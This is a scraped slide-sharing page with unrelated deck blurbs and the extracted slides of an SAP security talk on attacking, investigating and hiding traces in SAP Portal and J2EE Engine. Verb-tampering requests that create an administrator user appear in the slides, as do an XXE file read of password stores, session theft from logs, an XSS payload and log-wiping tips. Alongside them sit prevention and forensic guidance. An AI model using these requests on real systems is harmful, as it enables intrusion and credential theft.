Exploiting Critical Attack Vectors to Gain Control of SAP SystemsOnapsis Inc.
The largest organizations in the world rely on SAP platforms to run their critical processes and keep their business crown jewels: financial information, customers data, intellectual property, credit cards, human resources salaries, sensitive materials, suppliers and more. Everything is there – and attackers know it.
This presentation will highlight three attack vectors targeting SAP.
- SAP Portal Header Authentication
- Verb Tampering
- Abuse of JAVA Core Services
You will learn techniques to mitigate these threats.
The document discusses various security issues related to SAP systems. It begins with an introduction to SAP and overview of SAP security history. It then covers the top 10 latest interesting attacks against SAP systems, including authentication bypass vulnerabilities, buffer overflows, and denial of service attacks. The document provides details on each vulnerability, including technical details, potential business impacts, and recommendations for prevention. It aims to educate audiences on the most critical vulnerabilities impacting SAP systems.
Business applications like ERP, CRM, SRM, and others are one of the major topic of information security as these applications store business-critical data and any vulnerability in them can cause a significant monetary and reputational loss or even stoppage of business.
There are several myths about Business Applications Security such as:
Myth 1: Business Applications are available only internally.
Myth 2: ERP security is a vendors' problem.
Myth 3: Business Application internals are very specific and unknown to hackers.
Myth 4 ERP security is all about Segregation Of Duties.
Our findings explode these myths.
Top 5 .NET Challenges, Performance Monitoring Tips & TricksAppDynamics
This document summarizes a presentation about .NET performance challenges and monitoring tips. It discusses common .NET performance bottlenecks such as synchronization and locking, excessive logging, code dependencies, and database issues. It then provides tips for using AppDynamics monitoring including naming business transactions, configuring tier management, tuning snapshots, and setting thresholds. Finally, it introduces AppDynamics' unified monitoring platform that provides a single view of transactions across applications, databases, and infrastructure.
This document provides information about CoreToEdge, a technology services company. It details CoreToEdge's mission, vision, history, services, products, customers, and partners. CoreToEdge's services include SAP hosting, cloud services, training, and technology services. Their products include BasisCockpit for real-time SAP system monitoring and Verilista for predictive maintenance. The document shares CoreToEdge's numbers, locations, and social media accounts.
Similar to Breaking, forensicating and anti-forensicating SAP Portal and J2EE Engine (20)
Hand Rolled Applicative User ValidationCode KataPhilip Schwarz
Could you use a simple piece of Scala validation code (granted, a very simplistic one too!) that you can rewrite, now and again, to refresh your basic understanding of Applicative operators <*>, <*, *>?
The goal is not to write perfect code showcasing validation, but rather, to provide a small, rough-and ready exercise to reinforce your muscle-memory.
Despite its grandiose-sounding title, this deck consists of just three slides showing the Scala 3 code to be rewritten whenever the details of the operators begin to fade away.
The code is my rough and ready translation of a Haskell user-validation program found in a book called Finding Success (and Failure) in Haskell - Fall in love with applicative functors.
Neo4j - Product Vision and Knowledge Graphs - GraphSummit ParisNeo4j
Dr. Jesús Barrasa, Head of Solutions Architecture for EMEA, Neo4j
Découvrez les dernières innovations de Neo4j, et notamment les dernières intégrations cloud et les améliorations produits qui font de Neo4j un choix essentiel pour les développeurs qui créent des applications avec des données interconnectées et de l’IA générative.
Do you want Software for your Business? Visit Deuglo
Deuglo has top Software Developers in India. They are experts in software development and help design and create custom Software solutions.
Deuglo follows seven steps methods for delivering their services to their customers. They called it the Software development life cycle process (SDLC).
Requirement — Collecting the Requirements is the first Phase in the SSLC process.
Feasibility Study — after completing the requirement process they move to the design phase.
Design — in this phase, they start designing the software.
Coding — when designing is completed, the developers start coding for the software.
Testing — in this phase when the coding of the software is done the testing team will start testing.
Installation — after completion of testing, the application opens to the live server and launches!
Maintenance — after completing the software development, customers start using the software.
Essentials of Automations: The Art of Triggers and Actions in FMESafe Software
In this second installment of our Essentials of Automations webinar series, we’ll explore the landscape of triggers and actions, guiding you through the nuances of authoring and adapting workspaces for seamless automations. Gain an understanding of the full spectrum of triggers and actions available in FME, empowering you to enhance your workspaces for efficient automation.
We’ll kick things off by showcasing the most commonly used event-based triggers, introducing you to various automation workflows like manual triggers, schedules, directory watchers, and more. Plus, see how these elements play out in real scenarios.
Whether you’re tweaking your current setup or building from the ground up, this session will arm you with the tools and insights needed to transform your FME usage into a powerhouse of productivity. Join us to discover effective strategies that simplify complex processes, enhancing your productivity and transforming your data management practices with FME. Let’s turn complexity into clarity and make your workspaces work wonders!
OpenMetadata Community Meeting - 5th June 2024OpenMetadata
The OpenMetadata Community Meeting was held on June 5th, 2024. In this meeting, we discussed about the data quality capabilities that are integrated with the Incident Manager, providing a complete solution to handle your data observability needs. Watch the end-to-end demo of the data quality features.
* How to run your own data quality framework
* What is the performance impact of running data quality frameworks
* How to run the test cases in your own ETL pipelines
* How the Incident Manager is integrated
* Get notified with alerts when test cases fail
Watch the meeting recording here - https://www.youtube.com/watch?v=UbNOje0kf6E
Most important New features of Oracle 23c for DBAs and Developers. You can get more idea from my youtube channel video from https://youtu.be/XvL5WtaC20A
E-commerce Development Services- Hornet DynamicsHornet Dynamics
For any business hoping to succeed in the digital age, having a strong online presence is crucial. We offer Ecommerce Development Services that are customized according to your business requirements and client preferences, enabling you to create a dynamic, safe, and user-friendly online store.
Using Query Store in Azure PostgreSQL to Understand Query PerformanceGrant Fritchey
Microsoft has added an excellent new extension in PostgreSQL on their Azure Platform. This session, presented at Posette 2024, covers what Query Store is and the types of information you can get out of it.
UI5con 2024 - Boost Your Development Experience with UI5 Tooling ExtensionsPeter Muessig
The UI5 tooling is the development and build tooling of UI5. It is built in a modular and extensible way so that it can be easily extended by your needs. This session will showcase various tooling extensions which can boost your development experience by far so that you can really work offline, transpile your code in your project to use even newer versions of EcmaScript (than 2022 which is supported right now by the UI5 tooling), consume any npm package of your choice in your project, using different kind of proxies, and even stitching UI5 projects during development together to mimic your target environment.
Microservice Teams - How the cloud changes the way we workSven Peters
A lot of technical challenges and complexity come with building a cloud-native and distributed architecture. The way we develop backend software has fundamentally changed in the last ten years. Managing a microservices architecture demands a lot of us to ensure observability and operational resiliency. But did you also change the way you run your development teams?
Sven will talk about Atlassian’s journey from a monolith to a multi-tenanted architecture and how it affected the way the engineering teams work. You will learn how we shifted to service ownership, moved to more autonomous teams (and its challenges), and established platform and enablement teams.
Introducing Crescat - Event Management Software for Venues, Festivals and Eve...Crescat
Crescat is industry-trusted event management software, built by event professionals for event professionals. Founded in 2017, we have three key products tailored for the live event industry.
Crescat Event for concert promoters and event agencies. Crescat Venue for music venues, conference centers, wedding venues, concert halls and more. And Crescat Festival for festivals, conferences and complex events.
With a wide range of popular features such as event scheduling, shift management, volunteer and crew coordination, artist booking and much more, Crescat is designed for customisation and ease-of-use.
Over 125,000 events have been planned in Crescat and with hundreds of customers of all shapes and sizes, from boutique event agencies through to international concert promoters, Crescat is rigged for success. What's more, we highly value feedback from our users and we are constantly improving our software with updates, new features and improvements.
If you plan events, run a venue or produce festivals and you're looking for ways to make your life easier, then we have a solution for you. Try our software for free or schedule a no-obligation demo with one of our product specialists today at crescat.io
A Study of Variable-Role-based Feature Enrichment in Neural Models of CodeAftab Hussain
Understanding variable roles in code has been found to be helpful by students
in learning programming -- could variable roles help deep neural models in
performing coding tasks? We do an exploratory study.
- These are slides of the talk given at InteNSE'23: The 1st International Workshop on Interpretability and Robustness in Neural Software Engineering, co-located with the 45th International Conference on Software Engineering, ICSE 2023, Melbourne Australia
SMS API Integration in Saudi Arabia| Best SMS API ServiceYara Milbes
Discover the benefits and implementation of SMS API integration in the UAE and Middle East. This comprehensive guide covers the importance of SMS messaging APIs, the advantages of bulk SMS APIs, and real-world case studies. Learn how CEQUENS, a leader in communication solutions, can help your business enhance customer engagement and streamline operations with innovative CPaaS, reliable SMS APIs, and omnichannel solutions, including WhatsApp Business. Perfect for businesses seeking to optimize their communication strategies in the digital age.
Artificia Intellicence and XPath Extension FunctionsOctavian Nadolu
The purpose of this presentation is to provide an overview of how you can use AI from XSLT, XQuery, Schematron, or XML Refactoring operations, the potential benefits of using AI, and some of the challenges we face.
Unveiling the Advantages of Agile Software Development.pdfbrainerhub1
Learn about Agile Software Development's advantages. Simplify your workflow to spur quicker innovation. Jump right in! We have also discussed the advantages.
Unveiling the Advantages of Agile Software Development.pdf
Breaking, forensicating and anti-forensicating SAP Portal and J2EE Engine
1. Invest
in
security
to
secure
investments
Breaking,
forensica/ng
and
an/-‐forensica/ng
SAP
Portal
and
J2EE
Engine
2. About
ERPScan
• The
only
360-‐degree
SAP
Security
solu8on
-‐
ERPScan
Security
Monitoring
Suite
for
SAP
• Leader
by
the
number
of
acknowledgements
from
SAP
(
150+
)
• 60+
presenta/ons
key
security
conferences
worldwide
• 25
Awards
and
nomina/ons
• Research
team
-‐
20
experts
with
experience
in
different
areas
of
security
• Headquarters
in
Palo
Alto
(US)
and
Amsterdam
(EU)
2
3. Agenda
3
• Why
SAP
• Why
SAP
forensics
• Why
it
is
hard
• AJack
examples
and
forensics
– Simple
aJacks
– Advanced
aJacks
• Defense
• Conclusion
4. • The
most
popular
business
applica8on
• More
than
180000
customers
worldwide
• 74%
of
Forbes
500
run
SAP
• 300+
clients
in
South
Africa
by
2004
• Almost
every
South
Africa
Government
runs
SAP
SAP
4
5. • Espionage
– TheX
of
Financial
Informa8on
– Corporate
Secret
and
informa8on
theX
– Supplier
and
Customer
list
theX
– HR
data
theX
• Sabotage
– Denial
of
service
– Tampering
with
financial
records
– Access
to
technology
network
(SCADA)
by
trust
rela8ons
• Fraud
– False
transac8ons
– Modifica8on
of
master
data
5
Why
SAP
Security?
9. 9
Is
it
relevant
for
South
Africa?
Simple
scan
for
SAP
routers
exposed
to
the
Internet:
•
63
SAP
Routers
found
in
the
default
port
•
27
SAP
Routers
with
medium-‐cri8cal
issues
•
7
SAP
Routers
with
high-‐cri8cal
issues
Number
of
Web-‐based
SAP
Systems
found:
•
20
by
Shodan
10. 0
2
4
6
8
10
12
14
16
SAP Dispatcher SAP MMC SAP Message Server SAP HostControl SAP ITS Agate SAP Message Server
httpd
World
hJp://erpscan.com/wp-‐content/uploads/2012/06/SAP-‐Security-‐in-‐figures-‐a-‐global-‐survey-‐2007-‐2011-‐final.pdf
10
What
about
other
services?
11. *
This
aJack
has
not
been
confirmed
by
the
customer
nor
by
the
police
authori8es
in
Greece
inves8ga8ng
the
case.
SAP
does
not
have
any
indica8on
that
it
happened.
Now, it adds, “We gained full access to the
Greek Ministry of Finance. Those funky
IBM servers don't look so safe now, do
they...” Anonymous claims to have a
“sweet 0day SAP exploit”, and the group
intends to “sploit the hell out of it.”
11
Who
actually
tried
to
break
SAP?
12. 12
What
about
unpublished
threats?
• Companies
are
not
interested
in
publishing
informa8on
about
their
breaches
• There
are
a
lot
of
internal
breaches
thanks
to
unnecessarily
given
authoriza8ons
(An
employee
by
mistake
buys
hundreds
of
excavators
instead
of
ten)
• There
are
known
stories
about
backdoors
leX
by
developers
in
custom
ABAP
code
• How
can
you
be
sure
that,
if
a
breach
occurs,
you
can
find
evidence?
16. • Ideally, we should control everything, but this talk has limits, so
let’s focus on the most critical areas
What
do
we
need
to
monitor?
External
aYacks
on
SAP
16
• Awareness
AJack
users
and
SAP
GUI
• Secure
configura8on
and
patch
management
SAP
Router
• Disable
them
Exposed
SAP
services
• Too
much
issues
and
custom
configura8on
• May
be
0-‐days
• Need
to
concentrate
on
this
area
SAP
Portal
17. 17
SAP
Portal
• Point
of
web
access
to
SAP
systems
• Point
of
web
access
to
other
corporate
systems
• Way
for
aJackers
to
get
access
to
SAP
from
the
Internet
19. 19
Let’s
begin
the
technical
part
Full
logging
is
not
always
the
best
op/on
*not
only
because
of
system
highload
20. 20
Full
logging
is
not
always
the
best
op/on
• SAP
MMC
–
centralized
system
management
• Allowing
to
see
the
trace
and
log
messages
• If
TRACE_LEVEL
=
3
→
JSESSIONIDs
are
stored
in
logs
• <SID>DVEBMGS<id>j2eeclusterserver0logsystem
userinterface.log
• It’s
not
bad
if
you
only
use
it
some8mes
and
delete
logs
aXer
use,
but…
21. 21
But
some/mes
• SAP
MMC
has
remote
commands
• By
default,
many
commands
go
without
auth
• Commands
are
simple
SOAP
requests
• AJacker
can
read
logs
without
auth
• And
read
JSESSIONIDs
stored
in
logs
• And
use
them
for
logging
into
SAP
Portal
25. If
you
are
running
an
ABAP
+
Java
installa9on
of
Web
AS
with
SAP
Web
Dispatcher
as
a
load
balancing
solu9on,
you
can
safely
disable
logging
of
HTTP
requests
and
responses
on
J2EE
Engine,
and
use
the
corresponding
CLF
logs
of
SAP
Web
Dispatcher.
This
also
improves
the
HTTP
communica9on
performance.
The
only
drawback
of
using
the
Web
Dispatcher’s
CLF
logs
is
that
no
informa4on
is
available
about
the
user
execu4ng
the
request
(since
the
user
is
not
authen9cated
on
the
Web
Dispatcher,
but
on
the
J2EE
Engine
instead).
*Not
the
only….
There
are
many
complex
a>acks
with
POST
requests.
hJp://help.sap.com/saphelp_nw70ehp1/helpdata/en/ef/8cd7f51dfead42ab90537886104269/frameset.htm
25
SAP
Logging
26. hJp://help.sap.com/saphelp_nwpi71/helpdata/en/d6/49543b1e49bc1fe10000000a114084/frameset.htm
SAP
J2EE
Logging
26
• Categories
of
system
events
recording:
- System
–
all
system
related
security
and
administra8ve
logs.
- Applica8ons
–
all
system
events
related
to
business
logic.
- Performance
–
reserved
for
single
ac8vity
tracing.
• Default
loca8on
of
these
files
in
your
file
system
usrsap<sid>
<id>j2eecluster<node>log
• The
developer
trace
files
of
the
Java
instance
- <SID><instance
name>work
• The
developer
trace
files
of
the
central
services
- <SID><instance
name>work
- <SID><instance
name>log
• Java
server
logs
- <SID><instance
name>j2eeclusterserver<n>log
27. • Informa8on
disclosure
and
XSS
•
Verb
Tampering
via
HEAD
•
Invoker
servlet
via
GET
All
that
can
be
found
in
HTTP
headers.
j2eecluster<node>logsystemhttpaccess
responses.trc
27
Simple
aYacks
30.
• Create
a
new
user
ITWEB:ITWEB
HEAD
/ctc/ConfigServlet?param=com.sap.ctc.u8l.UserConfig;CREATEUSER;USERNAME=ITWEB,PASSWORD=ITWEB
•
Add
the
user
ITWEB
to
the
group
Administrators
HEAD
/ctc/ConfigServlet?param=com.sap.ctc.u8l.UserConfig;ADD_USER_TO_GROUP;USERNAME=ITWEB,GROUPNAME=Administrators
Works
when
UME
uses
JAVA
database
30
Verb
Tampering:
AYack
31. •
Install
SAP
Notes
1503579,
1616259
•
Install
other
SAP
Notes
about
Verb
Tampering
•
Scan
applica8ons
with
ERPScan
WEB.XML
checker
•
Disable
the
applica8ons
that
are
not
necessary
31
Verb
Tampering:
Preven/on
32. [Apr
3,
2013
1:23:59
AM
]
-‐
192.168.192.14
:
GET
/ctc/ConfigServlet
HTTP/1.1
401
1790
[Apr
3,
2013
1:30:01
AM
]
-‐
192.168.192.14
:
HEAD
/ctc/ConfigServlet?
param=com.sap.ctc.u8l.UserConfig;CREATEUSER;U
SERNAME=ITWEB,PASSWORD=ITWEB
HTTP/1.0
200
0
32
Verb
Tampering:
Forensics
36. • Update to the latest patch 1467771, 1445998
• “EnableInvokerServletGlobally” must be “false”
• Check all WEB.XML files with ERPScan
WEBXML checker
36
Invoker
servlet:
Preven/on
37.
•
Overwrite
log
file
with
trash
requests
•
Disable
logs
(need
server
restart)
•
Delete
logs
(not
so
easy)
*
There
should
be
a
separate
place
for
logs
to
prevent
modifica4ons
and
find
those
types
of
a>acks
37
An/-‐forensics
for
simple
aYacks
38.
•
CSRF
in
Webdynpro
JAVA
•
XXE
in
Portal
•
Malicious
upload
in
Portal
*
They
all
need
addi4onal
analysis,
like
enabling
POST
data
logging
or
indirect
signs
38
Advanced
aYacks
39. •
Webdynpro
unauthorized
modifica8ons
•
For
example:
- somebody
steals
an
account
using
XSS/CSRF/Sniffing
- then
tries
to
modify
the
severity
level
of
logs
39
Advanced
aYacks:
webdynpro
JAVA
41. • No
traces
of
change
in
default
log
files
clusterserver0logsystemhttpaccessresponses.log
• Webdynpro
sends
all
data
by
POST,
and
we
only
see
GET
URLs
in
responses.log
• But
some8mes
we
can
find
informa8on
by
indirect
signs
[Mar 20, 2013 9:35:49 AM ] - 172.16.0.63 : GET /
webdynpro/resources/sap.com/
tc~lm~webadmin~log_config~wd/Components/
com.sap.tc.log_configurator.LogConfigurator/warning.gif
HTTP/1.1 200 110
• Client
loaded
images
from
server
during
some
changes
41
Advanced
aYacks:
webdynpro
JAVA
42. • Most
ac8ons
have
icons
• They
have
to
be
loaded
from
the
server
• Usually,
legi8mate
users
have
them
all
in
cache
• AJackers
usually
don’t
have
them,
so
they
make
requests
to
the
server
• That’s
how
we
can
iden8fy
poten8ally
malicious
ac8ons
• But
there
should
be
correla8on
with
a
real
user’s
ac8vity
• False
posi8ves
are
possible:
- New
legi8mate
user
- Old
user
clears
cache
- Other
42
webdynpro
JAVA:
Forensics
43. •
Injec8on
of
malicious
requests
into
XML
packets
•
Can
lead
to
unauthorized
file
read,
DoS,
SSRF
•
There
is
an
XXE
vulnerability
in
SAP
Portal
•
Can
be
exploited
by
modifica8on
of
POST
request
•
It
is
possible
to
read
any
file
from
OS
and
much
more
43
XXE
in
Portal:
Details
47. • We can read any file
• Including config with passwords
• The SAP J2EE Engine stores the database
user SAP<SID>DB; its password is here:
• usrsap<SID>SYSglobalsecuritydata
SecStore.properties
47
XXE
in
Portal:
Result
48. •
Install
SAP
note
1619539
•
Restrict
read
access
to
files
SecStore.proper9es
and
SecStore.key
48
XXE
in
Portal:
Preven/on
50. XXE
in
Portal:
Forensics
• The only one way to get HTTP POST request values is to
enable HTTP Trace.
• Visual Administrator → Dispatcher → HTTP Provider
→ Properties: HttpTrace = enable.
- For 6.4 and 7.0 SP 12 and lower:
o On Dispatcher /j2ee/cluster/dispatcher/log/
defaultTrace.trc
o On Server j2eeclusterserver0logsystemhttpaccessresponses.0.trc
- For 7.0 SP13 and higher:
/j2ee/cluster/dispatcher/log/services/http/
req_resp.trc
• And then you need to manually analyze all requests if
there are any XXE attacks.
50
51. 51
Malicious
file
upload:
AYack
• Knowledge management allows to upload to the server
different types of files that can store malicious content
• Sometimes, if guest access is allowed, it is possible to
upload any file without being an authenticated user
• For example, it can be an HTML file with JavaScript that
steals cookies
54. Malicious
file
upload:
Forensics
• [Apr 10, 2013 2:26:13 AM ] - 192.168.192.22 :
POST /irj/servlet/prt/portal/prteventname/
HtmlbEvent/prtroot/pcd!3aportal_content!
2fspecialist!2fcontentmanager!2fContentManager!
2fcom.sap.km.ContentManager!
2fcom.sap.km.ContentExplorer!
2fcom.sap.km.ContentDocExplorer!
2fcom.sap.km.DocsExplorer/documents HTTP/1.1
200 13968
• [Apr 10, 2013 2:26:14 AM ] - 192.168.192.22 :
GET /irj/go/km/docs/etc/public/mimes/images/
html.gif HTTP/1.1 200 165
• *Again, images can help us
54
55. 55
Malicious
file
upload:
Preven/on
• Enable
File
Extension
and
Size
Filter.
- System
Administra9on
→
System
Configura9on
→
Content
Management
→
Repository
→
Filters
→
Show
Advanced
Op9ons
→
File
Extension
and
Size
Filter
- you
must
select
either
the
All
repositories
parameter,
or
at
least
one
repository
from
the
repository
list
in
the
Repositories
parameter.
Otherwise,
the
filter
is
not
created.
• Enable
Malicious
Script
Filter.
- System
Administra9on
→
System
Configura9on
→
Content
Management
→
Repository
→
Filters
→
Show
Advanced
Op9ons
→
Malicious
Script
Filter
- the
filter
also
detects
executable
scripts
in
files
that
are
being
modified
and
encodes
them
when
they
are
saved
o enable
Forbidden
Scripts.
Comma-‐separated
list
of
banned
script
tags
that
will
be
encoded
when
the
filter
is
applied.
o enable
the
Send
E-‐Mail
to
Administrator
op/on.
56. 56
Filtering
EPCF
in
XSS
• EPCF
provides
a
JavaScript
API
for
client-‐side
communica8on
between
the
Portal
components
and
the
Portal
core
framework
• EPCM
(Enterprise
Portal
Client
Manager)
• iViews
can
access
the
EPCM
object
from
every
page
• Every
iView
contains
the
EPCM
object
• For
example,
EPCF
is
used
for
tranmit
user
data
buffer
for
iViews
• <SCRIPT>alert(EPCM.loadClientData("urn:com.sap.myObjects“,"person");</SCRIPT>
57. 57
Advanced
aYacks:
An/-‐Forensics
• If
all
trace
is
enabled,
it
can
downgrade
speed
• It
can
also
occupy
all
the
storage
volume
• If
an
aJacker
want
to
spam
logs
with
trash
values,
he
can
do
it
much
faster
than
just
with
GET
logs
58. 58
Securing
SAP
Portal
• Patching
• Secure configuration
• Enabling HTTP Trace with masking
• Malicious script filter
• Log archiving
• Additional place for log storage
• Correlation of security events
59. And
one
more
thing:
• Portal
has
connec8ons
with
a
lot
of
systems
in
corporate
LAN
• Using
SSRF,
aJackers
can
get
access
to
these
systems
59
Portal
post-‐exploita/on
60. HTTP
Server
Corporate
network
Direct
aJack
GET
/vuln.jsp
SSRF
AJack
SSRF
AJack
Get
/vuln.jst
A
B
60
SSRF
aYacks
62. It
is
possible
to
protect
yourself
from
these
kinds
of
issues,
and
we
are
working
close
with
SAP
to
keep
customers
secure
SAP
Guides
It’s
all
in
your
hands
Regular
security
assessments
ABAP
code
review
Monitoring
technical
security
Segrega/on
of
Du/es
62
Conclusion
63. Future
work
• I'd like to thank SAP's Product Security Response
Team for the great cooperation to make SAP systems
more secure. Research is always ongoing, and we can't
share all of it today. If you want to be the first to see new
attacks and demos, follow us at @erpscan and attend
future presentations:
• May 21 – Training at AusCert (Gold Coast, Australia)
• June 5-6 – Presentation at RSA (Marina Bay Sands,
Singapore)
• September 10-12 – BlackHat Trainings (Istanbul, Turkey)
63